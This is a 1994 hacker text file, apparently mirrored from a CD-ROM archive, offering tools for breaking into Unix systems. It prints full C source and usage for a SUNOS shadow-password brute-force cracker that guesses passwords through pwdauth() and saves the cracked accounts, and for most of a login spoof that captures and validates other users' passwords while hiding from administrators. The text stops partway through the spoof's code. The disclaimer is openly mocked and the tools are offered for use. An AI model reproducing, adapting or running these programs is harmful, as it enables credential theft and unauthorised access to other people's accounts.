home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / unixtool.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  39.6 KB  |  1,372 lines

  1.  
  2. ****************************************************************************
  3.  
  4.                     ***********************************
  5.                     * Unix Hacking Tools of the Trade *
  6.                     *                                 *
  7.                     *                By               *
  8.                     *                                 *
  9.                     *  The Shining/UPi (UK Division)  *
  10.                     ***********************************
  11.  
  12. Disclaimer :
  13.  
  14. The following text is for educational purposes only and I strongly suggest
  15. that it is not used for malicious purposes....yeah right!
  16.  
  17. Introduction :
  18.  
  19. Ok, I decided to release this phile to help out all you guys who wish to
  20. start hacking unix. Although these programs should compile & run
  21. on your system if you follow the instructions I have given, knowing a bit
  22. of C will come in handy if things go wrong. Other docs I suggest you read
  23. are older 'phrack' issues with shooting sharks various articles on unix,
  24. and of course, 'Unix from the ground up' by The Prophet.
  25.  
  26. This article includes three programs, a SUNOS Brute force Shadow password
  27. file cracker, The Ultimate Login Spoof, and a Unix Account Validator.
  28.  
  29.                                Shadow Crack
  30.                                ------------
  31.  
  32.             SUNOS Unix brute force shadow password file cracker
  33.             ---------------------------------------------------
  34.  
  35. Well, a while back, I saw an article in phrack which included a brute force
  36. password cracker for unix. This was a nice idea, except that these days
  37. more and more systems are moving towards the shadow password scheme. This,
  38. for those of you who are new to unix, involves storing the actual encrypted
  39. passwords in a different file, usually only accessible to root. A typical
  40. entry from a System V R4 password file looks like this :-
  41.  
  42. root:x:0:1:Sys. admin:/:/bin/sh
  43.  
  44. with the actual encrypted password replaced by an 'x' in the /etc/passwd
  45. file. The encrypted password is stored in a file(in the case of sysV)
  46. called /etc/shadow which has roughly the following format :-
  47.  
  48. root:XyfgFekj95Fpq:::::
  49.  
  50. this includes the login i.d., the encrypted password, and various other
  51. fields which hold info on password ageing etc...(no entry in the other
  52. fields indicate they are disabled).
  53.  
  54. Now this was fine as long as we stayed away from system V's, but now a
  55. whole load of other companies have jumped on the bandwagon from IBM (aix)
  56. to Suns SUNOS systems. The system I will be dealing with is SUNOS's
  57. shadowed system. Now, like sysV, SUNOS also have a system whereby the
  58. actual encrypted passwords are stored in a file usually called
  59. /etc/security/passwd.adjunct, and normally this is accessible only by root.
  60. This rules out the use of brute force crackers, like the one in phrack
  61. quite a while back, and also modern day programs like CRACK. A typical
  62. /etc/passwd file entry on shadowed SUNOS systems looks like this :-
  63.  
  64. root:##root:0:1:System Administrator:/:/bin/csh
  65.  
  66. with the 'shadow' password file taking roughly the same format as that of
  67. Sys V, usually with some extra fields.
  68.  
  69. However, we cannot use a program like CRACK, but SUNOS also supplied a
  70. function called pwdauth(), which basically takes two arguments, a login
  71. name and decrypted password, which is then encrypted and compared to the
  72. appropriate entry in the shadow file, thus if it matches, we have a valid
  73. i.d. & password, if not, we don't.
  74.  
  75. I therefore decided to write a program which would exploit this function,
  76. and could be used to get valid i.d's and passwords even on a shadowed
  77. system!
  78.  
  79. To my knowledge the use of the pwdauth() function is not logged, but I could
  80. be wrong. I have left it running for a while on the system I use and it has
  81. attracted no attention, and the administrator knows his shit. I have seen
  82. the functions getspwent() and getspwnam() in Sys V to manipulate the
  83. shadow password file, but not a function like pwdauth() that will actually
  84. validate the i.d. and password. If such a function does exist on other
  85. shadowed systems then this program could be very easily modified to work
  86. without problems.
  87.  
  88. The only real beef I have about this program is that because the
  89. pwdauth() function uses the standard unix crypt() function to encrypt the
  90. supplied password, it is very slow!!! Even in burst mode, a password file
  91. with 1000's of users could take a while to get through. My advice is
  92. to run it in the background and direct all its screen output to /dev/null
  93. like so :-
  94.  
  95. shcrack -mf -uroot -ddict1 > /dev/null &
  96.  
  97. Then you can log out then come back and check on it later!
  98.  
  99. The program works in a number of modes, all of which I will describe below,
  100. is command line driven, and can be used to crack both multiple accounts in
  101. the password file and single accounts specified. It is also NIS/NFS (Sun
  102. Yellow Pages) compatible.
  103.  
  104. How to use it
  105. -------------
  106.  
  107. shcrack  -m[mode]  -p[password file]  -u[user id]  -d[dictionary file]
  108.  
  109. Usage :-
  110.  
  111. -m[mode]  there are 3 modes of operation :-
  112.  
  113. -mb  Burst mode, this scans the password file, trying the minimum number
  114.      of password guessing strategies on every account.
  115.  
  116. -mi  Mini-burst mode, this also scans the password file, and tries most
  117.      password guessing strategies on every account.
  118.  
  119. -mf  Brute-force mode, tries all password strategies, including the use
  120.      of words from a dictionary, on a single account specified.
  121.  
  122. more about these modes in a sec, the other options are :-
  123.  
  124. -p[password file]  This is the password file you wish to use, if this is
  125.                    left unspecified, the default is /etc/passwd.
  126.                    NB: The program automatically detects and uses the
  127.                    password file wherever it may be in NIS/NFS systems.
  128.  
  129. -u[user id]  The login i.d. of the account you wish to crack, this is used
  130.              in Brute-force single user mode.
  131.  
  132. -d[dict file]  This uses the words in a dictionary file to generate
  133.                possible passwords for use in single user brute force
  134.                mode. If no filename is specified, the program only uses the
  135.                password guessing strategies without using the dictionary.
  136.  
  137. Modes
  138. ^^^^^
  139.  
  140. -mb  Burst mode basically gets each account from the appropriate password
  141.      file and uses two methods to guess its password. Firstly, it uses the
  142.      account name as a password, this name is then reversed and tried as a
  143.      possible password. This may seem like a weak strategy, but remember,
  144.      the users passwords are already shadowed, and therefore are deemed to
  145.      be secure. This can lead to sloppy passwords being used, and I have
  146.      came across many cases where the user has used his/her i.d. as a
  147.      password.
  148.  
  149. -mi Mini-burst mode uses a number of other password generating methods
  150.     as well as the 2 listed in burst mode. One of the methods involves
  151.     taking the login i.d. of the account being cracked, and appending the
  152.     numbers 0 to 9 to the end of it to generate possible passwords. If
  153.     this mode has no luck, it then uses the accounts gecos 'comment'
  154.     information from the password file, splitting it into words and
  155.     trying these as passwords. Each word from the comment field is also
  156.     reversed and tried as a possible password.
  157.  
  158. -mf Brute-force single user mode uses all the above techniques for password
  159.     guessing as well as using a dictionary file to provide possible
  160.     passwords to crack a single account specified. If no dictionary filename
  161.     is given, this mode operates on the single account using the
  162.     same methods as mini-burst mode, without the dictionary.
  163.  
  164. Using shadow crack
  165. ------------------
  166.  
  167. To get program help from the command line just type :-
  168.  
  169. $ shcrack
  170.  
  171. which will show you all the modes of operation.
  172.  
  173. If you wanted to crack just the account 'root', located in
  174. /etc/passwd(or elsewhere on NFS/NIS systems), using all methods
  175. including a dictionary file called 'dict1', you would do :-
  176.  
  177. $ shcrack -mf -uroot -ddict1
  178.  
  179. to do the above without using the dictionary file, do :-
  180.  
  181. $ shcrack -mf -uroot
  182.  
  183. or to do the above but in password file 'miner' do :-
  184.  
  185. $ shcrack -mf -pminer -uroot
  186.  
  187. to start cracking all accounts in /etc/passwd, using minimum password
  188. strategies do :-
  189.  
  190. $ shcrack -mb
  191.  
  192. to do the above but on a password file called 'miner' in your home
  193. directory do :-
  194.  
  195. $ shcrack -mb -pminer
  196.  
  197. to start cracking all accounts in 'miner', using all strategies except
  198. dictionary words do :-
  199.  
  200. $ shcrack -mi -pminer
  201.  
  202. ok, heres the code, ANSI C Compilers only :-
  203.  
  204. ---cut here-------------------------------------------------------------------
  205.  
  206. /* Program   : Shadow Crack
  207.    Author    : (c)1994 The Shining/UPi (UK Division)
  208.    Date      : Released 12/4/94
  209.    Unix type : SUNOS Shadowed systems only */
  210.  
  211. #include
  212. #include
  213. #include
  214. #include
  215. #include
  216.  
  217. #define WORDSIZE 20     /* Maximum word size */
  218. #define OUTFILE "data"  /* File to store cracked account info */
  219.  
  220. void word_strat( void ), do_dict( void );
  221. void add_nums( char * ), do_comment( char * );
  222. void try_word( char * ), reverse_word( char * );
  223. void find_mode( void ), burst_mode( void );
  224. void mini_burst( void ), brute_force( void );
  225. void user_info( void ), write_details( char * );
  226. void pwfile_name( void ), disable_interrupts( void ), cleanup();
  227.  
  228. char *logname, *comment, *homedir, *shell, *dict, *mode,
  229.      *pwfile, *pwdauth();
  230. struct passwd *getpwnam(), *pwentry;
  231. extern char *optarg;
  232. int option, uid, gid;
  233.  
  234. int main( int argc, char **argv )
  235. {
  236. disable_interrupts();
  237. system("clear");
  238.  
  239. if (argc < 2) {
  240. printf("Shadow Crack - (c)1994 The Shining\n");
  241. printf("SUNOS Shadow password brute force cracker\n\n");
  242. printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
  243. printf("-d[dictfile]\n\n\n");
  244. printf("[b] is burst mode, scans pwfile trying minimum\n");
  245. printf("    password strategies on all i.d's\n\n");
  246. printf("[i] is mini-burst mode, scans pwfile trying both\n");
  247. printf("    userid, gecos info, and numbers to all i.d's\n\n");
  248. printf("[f] is bruteforce mode, tries all above stategies\n");
  249. printf("    as well as dictionary words\n\n");
  250. printf("[pwfile]   Uses the password file [pwfile], default\n");
  251. printf("           is /etc/passwd\n\n");
  252. printf("[loginid]  Account you wish to crack, used with\n");
  253. printf("           -mf bruteforce mode only\n\n");
  254. printf("[dictfile] uses dictionary file [dictfile] to\n");
  255. printf("           generate passwords when used with\n");
  256. printf("           -mf bruteforce mode only\n\n");
  257. exit(0);
  258. }
  259.  
  260. /* Get options from the command line and store them in different
  261.    variables */
  262.  
  263. while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
  264.  switch(option)
  265.  {
  266.    case 'm':
  267.            mode = optarg;
  268.            break;
  269.  
  270.    case 'p':
  271.            pwfile = optarg;
  272.            break;
  273.  
  274.    case 'u':
  275.            logname = optarg;
  276.            break;
  277.  
  278.    case 'd':
  279.            dict = optarg;
  280.            break;
  281.  
  282.    default:
  283.            printf("wrong options\n");
  284.            break;
  285.  }
  286.  
  287. find_mode();
  288. }
  289.  
  290. /* Routine to redirect interrupts */
  291.  
  292. void disable_interrupts( void )
  293. {
  294. signal(SIGHUP, SIG_IGN);
  295.  signal(SIGTSTP, cleanup);
  296.   signal(SIGINT, cleanup);
  297.  signal(SIGQUIT, cleanup);
  298. signal(SIGTERM, cleanup);
  299. }
  300.  
  301. /* If CTRL-Z or CTRL-C is pressed, clean up & quit */
  302.  
  303. void cleanup( void )
  304. {
  305. FILE *fp;
  306.  
  307. if ((fp = fopen("gecos", "r")) != NULL)
  308.    remove("gecos");
  309.  
  310. if ((fp = fopen("data", "r")) == NULL)
  311.    printf("\nNo accounts cracked\n");
  312.  
  313. printf("Quitting\n");
  314. exit(0);
  315. }
  316.  
  317. /* Function to decide which mode is being used and call appropriate
  318.    routine */
  319.  
  320. void find_mode( void )
  321. {
  322.  if (strcmp(mode, "b") == NULL)
  323.     burst_mode();
  324.  else
  325.  if (strcmp(mode, "i") == NULL)
  326.     mini_burst();
  327.  else
  328.  if (strcmp(mode, "f") == NULL)
  329.     brute_force();
  330.  else
  331.   {
  332.     printf("Sorry - No such mode\n");
  333.     exit(0);
  334.   }
  335. }
  336.  
  337. /* Get a users information from the password file */
  338.  
  339. void user_info( void )
  340. {
  341.   uid = pwentry->pw_uid;
  342.    gid = pwentry->pw_gid;
  343.     comment = pwentry->pw_gecos;
  344.    homedir = pwentry->pw_dir;
  345.   shell = pwentry->pw_shell;
  346. }
  347.  
  348. /* Set the filename of the password file to be used, default is
  349.    /etc/passwd */
  350.  
  351. void pwfile_name( void )
  352. {
  353. if (pwfile != NULL)
  354.     setpwfile(pwfile);
  355. }
  356.  
  357. /* Burst mode, tries user i.d. & then reverses it as possible passwords
  358.    on every account found in the password file */
  359.  
  360. void burst_mode( void )
  361. {
  362. pwfile_name();
  363. setpwent();
  364.  
  365.   while ((pwentry = getpwent()) != (struct passwd *) NULL)
  366.   {
  367.      logname = pwentry->pw_name;
  368.       user_info();
  369.       try_word( logname );
  370.      reverse_word( logname );
  371.   }
  372.  
  373. endpwent();
  374. }
  375.  
  376. /* Mini-burst mode, try above combinations as well as other strategies
  377.    which include adding numbers to the end of the user i.d. to generate
  378.    passwords or using the comment field information in the password
  379.    file */
  380.  
  381. void mini_burst( void )
  382. {
  383. pwfile_name();
  384. setpwent();
  385.  
  386.   while ((pwentry = getpwent()) != (struct passwd *) NULL)
  387.   {
  388.      logname = pwentry->pw_name;
  389.       user_info();
  390.      word_strat();
  391.   }
  392.  
  393. endpwent();
  394. }
  395.  
  396. /* Brute force mode, uses all the above strategies as well using a
  397.    dictionary file to generate possible passwords */
  398.  
  399. void brute_force( void )
  400. {
  401. pwfile_name();
  402. setpwent();
  403.  
  404.   if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
  405.      printf("Sorry - User unknown\n");
  406.      exit(0);
  407.   }
  408.   else
  409.   {
  410.      user_info();
  411.       word_strat();
  412.      do_dict();
  413.   }
  414.  
  415. endpwent();
  416. }
  417.  
  418. /* Calls the various password guessing strategies */
  419.  
  420. void word_strat()
  421. {
  422.  try_word( logname );
  423.   reverse_word( logname );
  424.    add_nums( logname );
  425.   do_comment( comment );
  426. }
  427.  
  428. /* Takes the user name as its argument and then generates possible
  429.    passwords by adding the numbers 0-9 to the end. If the username
  430.    is greater than 7 characters, don't bother */
  431.  
  432. void add_nums( char *wd )
  433. {
  434. int i;
  435. char temp[2], buff[WORDSIZE];
  436.  
  437. if (strlen(wd) < 8) {
  438.  
  439.   for (i = 0; i < 10; i++)
  440.   {
  441.       strcpy(buff, wd);
  442.        sprintf(temp, "%d", i);
  443.         strcat(wd, temp);
  444.        try_word( wd );
  445.       strcpy(wd, buff);
  446.   }
  447.  
  448.  }
  449. }
  450.  
  451. /* Gets info from the 'gecos' comment field in the password file,
  452.    then process this information generating possible passwords from it */
  453.  
  454. void do_comment( char *wd )
  455. {
  456. FILE *fp;
  457.  
  458. char temp[2], buff[WORDSIZE];
  459. int c,  flag;
  460.  
  461. flag = 0;
  462.  
  463. /* Open file & store users gecos information in it. w+ mode
  464.    allows us to write to it & then read from it. */
  465.  
  466. if ((fp = fopen("gecos", "w+")) == NULL) {
  467.     printf("Error writing gecos info\n");
  468.    exit(0);
  469. }
  470.  
  471.     fprintf(fp, "%s\n", wd);
  472.    rewind(fp);
  473.  
  474. strcpy(buff, "");
  475.  
  476. /* Process users gecos information, separate words by checking for the
  477.    ',' field separater or a space. */
  478.  
  479. while ((c = fgetc(fp)) != EOF)
  480. {
  481.  
  482.  if (( c != ',' ) && ( c != ' ' )) {
  483.      sprintf(temp, "%c", c);
  484.     strncat(buff, temp, 1);
  485.  }
  486.  else
  487.     flag = 1;
  488.  
  489.    if ((isspace(c)) || (c == ',') != NULL) {
  490.  
  491.      if (flag == 1) {
  492.         c=fgetc(fp);
  493.  
  494.         if ((isspace(c)) || (iscntrl(c) == NULL))
  495.            ungetc(c, fp);
  496.      }
  497.  
  498.      try_word(buff);
  499.       reverse_word(buff);
  500.        strcpy(buff, "");
  501.       flag = 0;
  502.      strcpy(temp, "");
  503.    }
  504.  
  505. }
  506. fclose(fp);
  507. remove("gecos");
  508. }
  509.  
  510. /* Takes a string of characters as its argument(in this case the login
  511.    i.d., and then reverses it */
  512.  
  513. void reverse_word( char *wd )
  514. {
  515. char temp[2], buff[WORDSIZE];
  516. int i;
  517.  
  518. i = strlen(wd) + 1;
  519.  strcpy(temp, "");
  520. strcpy(buff, "");
  521.  
  522.  do
  523.  {
  524.     i--;
  525.     if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
  526.         sprintf(temp, "%c", wd[i]);
  527.        strncat(buff, temp, 1);
  528.     }
  529.  
  530.  } while(i != 0);
  531.  
  532. if (strlen(buff) > 1)
  533.    try_word(buff);
  534. }
  535.  
  536. /* Read one word at a time from the specified dictionary for use
  537.    as possible passwords, if dictionary filename is NULL, ignore
  538.    this operation */
  539.  
  540. void do_dict( void )
  541. {
  542. FILE *fp;
  543. char buff[WORDSIZE], temp[2];
  544. int c;
  545.  
  546. strcpy(buff, "");
  547. strcpy(temp, "");
  548.  
  549. if (dict == NULL)
  550.    exit(0);
  551.  
  552.    if ((fp = fopen(dict, "r")) == NULL) {
  553.        printf("Error opening dictionary file\n");
  554.       exit(0);
  555.    }
  556.  
  557. rewind(fp);
  558.  
  559.  while ((c = fgetc(fp)) != EOF)
  560.  {
  561.   if ((c != ' ') || (c != '\n')) {
  562.      strcpy(temp, "");
  563.       sprintf(temp, "%c", c);
  564.      strncat(buff, temp, 1);
  565.   }
  566.  
  567.   if (c == '\n') {
  568.     if (buff[0] != ' ')
  569.        try_word(buff);
  570.  
  571.       strcpy(buff, "");
  572.   }
  573.  }
  574.  
  575. fclose(fp);
  576. }
  577.  
  578. /* Process the word to be used as a password by stripping \n from
  579.    it if necessary, then use the pwdauth() function, with the login
  580.    name and word to attempt to get a valid id & password */
  581.  
  582. void try_word( char pw[] )
  583. {
  584. int pwstat, i, pwlength;
  585. char temp[2], buff[WORDSIZE];
  586.  
  587. strcpy(buff, "");
  588. pwlength = strlen(pw);
  589.  
  590. for (i = 0; i != pwlength; i++)
  591. {
  592.  
  593.  if (pw[i] != '\n') {
  594.      strcpy(temp, "");
  595.      sprintf(temp, "%c", pw[i]);
  596.     strncat(buff, temp, 1);
  597.  }
  598. }
  599.  
  600.  if (strlen(buff) > 3 ) {
  601.      printf("Trying : %s\n", buff);
  602.  
  603.      if (pwstat = pwdauth(logname, buff) == NULL) {
  604.          printf("Valid Password! - writing details to 'data'\n");
  605.  
  606.          write_details(buff);
  607.  
  608.         if (strcmp(mode, "f") == NULL)
  609.            exit(0);
  610.      }
  611.  }
  612. }
  613.  
  614. /* If valid account & password, store this, along with the accounts
  615.    uid, gid, comment, homedir & shell in a file called 'data' */
  616.  
  617. void write_details( char *pw )
  618. {
  619. FILE *fp;
  620.  
  621. if ((fp = fopen(OUTFILE, "a")) == NULL) {
  622.     printf("Error opening output file\n");
  623.    exit(0);
  624. }
  625.  
  626. fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
  627.  fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
  628. fclose(fp);
  629. }
  630.  
  631. ---cut here-------------------------------------------------------------------
  632.  
  633. again to compile it do :-
  634.  
  635. $ gcc shcrack.c -o shcrack
  636.  
  637. or
  638.  
  639. $ acc shcrack.c -o shcrack
  640.  
  641. this can vary depending on your compiler.
  642.  
  643.                          The Ultimate Login Spoof
  644.                          ^^^^^^^^^^^^^^^^^^^^^^^^
  645.  
  646. Well this subject has been covered many times before but its a while since
  647. I have seen a good one, and anyway I thought other unix spoofs have had two
  648. main problems :-
  649.  
  650. 1) They were pretty easy to detect when running
  651. 2) They recorded any only shit entered.....
  652.  
  653. Well now I feel these problems have been solved with the spoof below.
  654. Firstly, I want to say that no matter how many times spoofing is deemed as
  655. a 'lame' activity, I think it is very underestimated.
  656.  
  657. When writing this I have considered every possible feature such a program
  658. should have. The main ones are :-
  659.  
  660. 1) To validate the entered login i.d. by searching for it in the
  661.    password file.
  662.  
  663. 2) Once validated, to get all information about the account entered
  664.    including - real name etc from the comment field, homedir info
  665.    (e.g. /homedir/miner) and the shell the account is using and
  666.    store all this in a file.
  667.  
  668. 3) To keep the spoofs tty idle time to 0, thus not to arouse the
  669.    administrators suspicions.
  670.  
  671. 4) To validates passwords before storing them, on all unshadowed unix systems
  672.    & SUNOS shadowed/unshadowed systems.
  673.  
  674. 5) To emulates the 'sync' dummy account, thus making it act like the
  675.    real login program.
  676.  
  677. 6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
  678.    quit if it has not grabbed an account within a specified time.
  679.  
  680. 7) To automatically detect & display the hostname before the login prompt
  681.    e.g. 'ccu login:', this feature can be disabled if desired.
  682.  
  683. 8) To run continuously until a valid i.d. & valid password are entered.
  684.  
  685. As well as the above features, I also added a few more to make the spoof
  686. 'foolproof'. At university, a lot of the users have been 'stung' by
  687. login spoofs in the past, and so have become very conscious about security.
  688.  
  689. For example, they now try and get around spoofs by entering any old crap when
  690. prompted for their login name, or to hit return a few times, to prevent any
  691. 'crappy' spoofs which may be running. This is where my spoof shines!,
  692. firstly if someone was to enter -
  693.  
  694. login: dhfhfhfhryr
  695. Password:
  696.  
  697. into the spoof, it checks to see if the login i.d. entered is
  698. valid by searching for it in the password file. If it exists, the
  699. spoof then tries to validate the password. If both the i.d. & password
  700. are valid, these will be stored in a file called .data, along with
  701. additional information about the account taken directly from the password
  702. file.
  703.  
  704. Now if, as in the case above, either the login name or password is
  705. incorrect, the information is discarded, and the login spoof runs again,
  706. waiting for a valid user i.d. & password to be entered.
  707.  
  708. Also, a lot of systems these days have an unpassworded account called
  709. 'sync', which when logged onto, usually displays the date & time the
  710. sync account was last logged into, and from which server or tty,
  711. the message of the day, syncs the disk, and then logs you straight out.
  712.  
  713. A few people have decided that the best way to dodge login spoofs is to
  714. first login to this account then when they are automatically logged out,
  715. to login to their own account.
  716.  
  717. They do this firstly, so that if a spoof is running it only records the
  718. details of the sync account and secondly the spoof would not act as the
  719. normal unix login program would, and therefore they would spot it and report
  720. it, thus landing you in the shit with the system administrator.
  721.  
  722. However, I got around this problem so that when someone
  723. tries to login as sync (or another account of a similar type, which you can
  724. define), it acts exactly like the normal login program would, right down to
  725. displaying the system date & time as well as the message of the day!!
  726.  
  727.                           The idle time facility
  728.                           ----------------------
  729.  
  730. One of the main problems with unix spoofs, is they can be spotted
  731. so easily by the administrator, as he/she could get a list of current
  732. users on the system and see that an account was logged on, and had been
  733. idle for maybe 30 minutes. They would then investigate & the spoof
  734. would be discovered.
  735.  
  736. I have therefore incorporated a scheme in the spoof whereby
  737. approx. every minute, the tty the spoof is executed from, is 'touched'
  738. with the current time, this effectively simulates terminal activity &
  739. keeps the terminals idle time to zero, which helps the spoofs chances
  740. of not being discovered greatly.
  741.  
  742. The spoof also incorporates a routine which will automatically
  743. keep track of approximately how long the spoof has been running, and if
  744. it has been running for a specified time without grabbing an i.d. or password,
  745. will automatically exit and run the real login program.
  746. This timer is by default set to 12.5 minutes, but you can alter this time
  747. if you wish.
  748.  
  749. Note: Due to the varying processing power of some systems, I could not
  750.       set the timer to exactly 60 seconds, I have therefore set it to 50,
  751.       incase it loses or gains extra time. Take this into consideration when
  752.       setting the spoofs timer to your own value. I recommend you
  753.       stick with the default, and under no circumstances let it run
  754.       for hours.
  755.  
  756.                       Password Validation techniques
  757.                       ------------------------------
  758.  
  759. The spoof basically uses 2 methods of password validation(or none at
  760. all on a shadowed system V). Firstly, when the spoof is used on any unix
  761. with an unshadowed password file, it uses the crypt function to validate a
  762. password entered. If however the system is running SUNOS 4.1.+ and
  763. incorporates the shadow password system, the program uses a function called
  764. pwdauth(). This takes the login i.d. & decrypted password as its arguments
  765. and checks to see if both are valid by encrypting the password and
  766. comparing it to the shadowed password file which is usually located in
  767. /etc/security and accessible only by root. By validating both the i.d. &
  768. password we ensure that the data which is saved to file is correct and not
  769. any old bullshit typed at the terminal!!!
  770.  
  771.                             Executing the Spoof
  772.                             -------------------
  773.  
  774. ok, now about the program. This is written in ANSI-C, so I hope you have a
  775. compatible compiler, GCC or suns ACC should do it. Now the only time you
  776. will need to change to the code is in the following circumstances :-
  777.  
  778. 1) If you are to compile & run it on an unshadowed unix,
  779.    in which case remove all references to the pwdauth() function,
  780.    from both the declarations & the shadow checking routine, add
  781.    this code in place of the shadow password checking routine :-
  782.  
  783.         if ( shadow == 1 ) {
  784.              invalid = 0;
  785.           else
  786.              invalid = 1;
  787.        }
  788.  
  789. 2) Add the above code also to the spoof if you are running this on a system
  790.    V which is shadowed. In this case the spoof loses its ability to
  791.    validate the password, to my knowledge there is no sysV equivalent
  792.    of the pwdauth() function.
  793.  
  794. Everything else should be pretty much compatible. You should have no
  795. problems compiling & running this on an unshadowed SUNOS machine, if
  796. you do, make the necessary changes as above, but it compiled ok
  797. on every unshadowed SUNOS I tested it on. The Spoof should
  798. automatically detect whether a SUNOS system is shadowed or unshadowed
  799. and run the appropriate code to deal with each situation.
  800.  
  801. Note: when you have compiled this spoof, you MUST 'exec' it from the
  802.       current shell for it to work, you must also only have one shell
  803.       running. e.g. from C or Bourne shell using the GNU C Compiler do :-
  804.  
  805. $ gcc spoof.c -o spoof
  806. $ exec spoof
  807.  
  808. This replaces the current shell with the spoof, so when the spoof quits &
  809. runs the real login program, the hackers account is effectively logged off.
  810.  
  811. ok enough of the bullshit, here's the spoof :-
  812.  
  813. ----------cut here-------------------------------------------------------
  814.  
  815. /* Program   : Unix login spoof
  816.    Author    : The Shining/UPi (UK Division)
  817.    Date      : Released 12/4/94
  818.    Unix Type : All unshadowed unix systems &
  819.                shadowed SUNOS systems
  820.    Note      : This file MUST be exec'd from the shell. */
  821.  
  822. #include
  823. #include
  824. #include
  825. #include
  826. #include
  827. #include
  828.  
  829. #define OUTFILE ".data"           /* Data file to save account info into */
  830. #define LOGPATH "/usr/bin/login"  /* Path of real login program */
  831. #define DUMMYID "sync"            /* Dummy account on your system */
  832. #define DLENGTH 4                 /* Length of dummy account name */
  833.  
  834. FILE *fp;
  835.  
  836. /* Set up variables to store system time & date */
  837.  
  838. time_t now;
  839.  
  840. static int time_out, time_on, no_message, loop_cnt;
  841.  
  842. /* Set up a structure to store users information */
  843.  
  844. struct loginfo {
  845.               char logname[10];
  846.               char key[9];
  847.               char *comment;
  848.               char *homedir;
  849.               char *shell;
  850.             } u;
  851.  
  852. /* Use the unix function getpass() to read user password and
  853.    crypt() or pwdauth()  (remove it below if not SUNOS)
  854.    to validate it etc */
  855.  
  856. char *getpass(), *gethostname(), *alarm(), *sleep(),
  857.      *crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
  858.      pass[14], salt[3], *tty, cons[] = " on console ",
  859.      hname[72], *ld;
  860.  
  861. /* flag = exit status, ppid = pid shell, wait = pause length,
  862.    pwstat = holds 0 if valid password, shadow holds 1 if shadow
  863.    password system is being used, 0 otherwise. */
  864.  
  865. int flag, ppid, wait, pwstat, shadow, invalid;
  866.  
  867. /* Declare main functions */
  868.  
  869.      void write_details(struct loginfo *);
  870.      void catch( void ), disable_interrupts( void );
  871.      void log_out( void ), get_info( void ),
  872.           invalid_login( void ), prep_str( char * );
  873.  
  874. /* set up pointer to point to pwfile structure, and also
  875.    a pointer to the utime() structure */
  876.  
  877. struct passwd *pwentry, *getpwnam();
  878. struct utimbuf *times;
  879.  
  880. int main( void )
  881. {
  882. system("clear");
  883.  
  884. /* Initialise main program variables to 0, change 'loop_cnt' to 1
  885.    if you do not want the machines host name to appear with
  886.    the login prompt! (e.g. prompt is `login:` instead of
  887.    'MIT login:'  etc) */
  888.  
  889.      wait = 3;               /* Holds value for pause */
  890.       flag = 0;              /* Spoof ends if value is 1 */
  891.        loop_cnt = 0;         /* Change this to 1 if no host required */
  892.        time_out = 0;         /* Stops timer if spoof has been used */
  893.       time_on = 0;           /* Holds minutes spoof has been running */
  894.      disable_interrupts();   /* Call function to disable Interrupts */
  895.  
  896. /* Get system time & date and store in log_date, this is
  897.    displayed when someone logs in as 'sync' */
  898.  
  899.  now = time(NULL);
  900.   strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
  901.   strcat(log_date, cons);
  902.  ld = log_date;
  903.  
  904. /* Get Hostname and tty name */
  905.  
  906. gethostname(hname, 64);
  907.  strcat(hname, " login: ");
  908. tty = ttyname();
  909.  
  910. /* main routine */
  911.  
  912.   while( flag == 0 )
  913.   {
  914.        invalid = 0;        /* Holds 1 if id +/or pw are invalid */
  915.         shadow = 0;        /* 1 if shadow scheme is in operation */
  916.          no_message = 0;   /* Flag for Login Incorrect msg */
  917.         alarm(50);         /* set timer going */
  918.        get_info();         /* get user i.d. & password */
  919.  
  920. /* Check to see if the user i.d. entered is 'sync', if it is
  921.    display system time & date, display message of the day and
  922.    then run the spoof again, insert the account of your
  923.    choice here, if its not sync, but remember to put
  924.    the length of the accounts name next to it! */
  925.  
  926.      if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
  927.         printf("%s\n", ld);
  928.  
  929.           if ((fp = fopen("/etc/motd", "r")) != NULL) {
  930.               while ((motd = getc(fp)) != EOF)
  931.                      putchar(motd);
  932.  
  933.               fclose(fp);
  934.           }
  935.  
  936.            printf("\n");
  937.              prep_str(u.logname);
  938.              no_message = 1;
  939.            sleep(wait);
  940.      }
  941.  
  942. /* Check if a valid user i.d. has been input, then check to see if
  943.    the password system is shadowed or unshadowed.
  944.    If both the user i.d. & password are valid, get additional info
  945.    from the password file, and store all info in a file called .data,
  946.    then exit spoof and run real login program */
  947.  
  948.     setpwent();   /* Rewind pwfile to beign processing */
  949.  
  950.     if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
  951.          invalid = 1;
  952.         flag = 0;
  953.     }
  954.     else
  955.        strncpy(salt, pwentry->pw_passwd, 2);
  956.  
  957. /* Check for shadowed password system, in SUNOS, the field in /etc/passwd
  958.    should begin with '##', in system V it could contain an 'x', if none
  959.    of these exist, it checks that the entry = 13 chars, if less then
  960.    shadow system will probably be implemented (unless acct has been
  961.    disabled) */
  962.  
  963.  if ( invalid == 0 ) {
  964.  
  965.        if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
  966.            shadow = 1;
  967.        else
  968.           if (strlen(pwentry->pw_passwd) < 13)
  969.              shadow = 1;
  970.  
  971. /* If unshadowed, use the salt from the pwfile field & the key to
  972.    form the encrypted password which is checked against the entry
  973.    in the password file, if it matches, then all is well, if not,
  974.    spoof runs again!! */
  975.  
  976.     if ( shadow != 1 ) {
  977.  
  978.       if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
  979.          invalid = 0;
  980.       else
  981.          invalid = 1;
  982.     }
  983.  
  984. /* If SUNOS Shadowing is in operation, use the pwdauth() function
  985.    to validate the password, if not SUNOS, substitute this code
  986.    with the routine I gave earlier! */
  987.  
  988.        if ( shadow == 1 ) {
  989.           if (pwstat = pwdauth(u.logname, u.key) == NULL)
  990.              invalid = 0;
  991.           else
  992.              invalid = 1;
  993.        }
  994. }
  995.  
